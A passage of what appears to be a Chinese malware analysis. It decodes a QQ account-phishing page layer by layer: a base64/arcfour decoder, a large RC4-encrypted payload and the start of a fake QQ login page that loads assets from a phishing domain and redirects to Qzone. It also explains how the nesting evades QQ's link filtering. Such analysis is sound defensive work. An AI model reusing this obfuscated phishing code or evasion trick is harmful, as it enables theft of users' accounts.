d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}

可见该脚本内嵌了一个html网站,且该段代码用了Escape加密(图中脚本代码使用unescape函数解密),我复制了这段代码找了个网站进行了escape解密,得到了以下html代码:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<!--注意下面script脚本的插入,并使用了acrfour算法配合base64密文加密了一段代码,最后用URIComponent加密-->
<script type="text/javascript">
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("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"))));
</script>
</head>
<body>
</body>
</html>

从script标签中不难看出该html代码中又内嵌了js脚本!不得不佩服这种网站嵌js,js嵌html,html再嵌js的思路(而这种嵌套正利用了腾讯官方网页不会被QQ拦截的漏洞,从而盗号),并且该js代码中又看到了URIComponent编码、arcfour算法配合base64加密,首先解密base64密文,再用enURIComponent解编码(我就不详细解密过程了),又得到了一个html网站(最终网站),代码如下:


<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<title>登录</title>
<link rel="stylesheet" href="https://9q3j.cn/template/css.css"/>
<!--顶部banner-->
</head>
<script type="text/javascript">
function setCookie(name, value) {
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");

if (arr = document.cookie.match(reg))

return unescape(arr[2]);
else
return 0;
}
if (getCookie("login")){
window.location.href='https://qzone.qq.com';//二次跳转地址

}

$(function(){
mqq.ui.setTitleButtons({
left : {
title : "QQ",
callback : function () {
}
},
right : {
